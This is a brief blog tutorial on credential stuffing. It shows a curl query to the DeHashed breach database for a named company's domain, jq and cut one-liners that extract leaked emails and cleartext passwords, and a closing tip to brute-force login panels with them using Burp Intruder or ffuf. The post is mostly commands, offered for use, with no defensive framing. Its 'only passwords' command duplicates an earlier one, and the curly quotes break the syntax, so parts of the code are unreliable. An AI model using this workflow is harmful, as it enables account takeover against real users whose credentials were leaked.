# Credential Stuffing (part 2) CLI **Published by:** [TheSecurityGuy](https://paragraph.com/@mrbalu/) **Published on:** 2022-12-01 **URL:** https://paragraph.com/@mrbalu/credential-stuffing-part-2-cli ## Content Query to get the Data (it will be in json format) curl 'https://api.dehashed.com/search?query=domain:"swiggy.com"' \ -u email@email.com:api-key \ -H 'Accept: application/json' | tee dehashed_company_output.txt But how to format the output json to get only usernames,emails and passwords cat dehashed_company_output.txt | jq -r '.entries | .[] | select(.password|test(".+")) | [.email,.password] | join(“,“)' To get only emails cat dehashed_company_output.txt | jq -r '.entries | .[] | select(.password|test(".+")) | [.email,.password] | join(“,“)' | cut -d”,” -f1 To get only passwords cat dehashed_company_output.txt | jq -r '.entries | .[] | select(.password|test(".+")) | [.email,.password] | join(“,“)' You can change it to a way how you need it. test is for matching the regex. you can play with jq to understand it better. After you get the credentials from the above query you can bruteforce the login panels using pitchfork in intruder / ffuf. I’ll keep the posts short and straight to the point. Any queries? Comment or contact me on twitter. @_thesecurityguy The single jq line above took me 3 hours to figure out how to process the output in a detailed way. The time invested by me = Time you saved. Share your thanks https://www.buymeacoffee.com/ballx ## Publication Information - [TheSecurityGuy](https://paragraph.com/@mrbalu/): Publication homepage - [All Posts](https://paragraph.com/@mrbalu/): More posts from this publication - [RSS Feed](https://api.paragraph.com/blogs/rss/@mrbalu): Subscribe to updates - [Twitter](https://twitter.com/_TheSecurityGuy): Follow on Twitter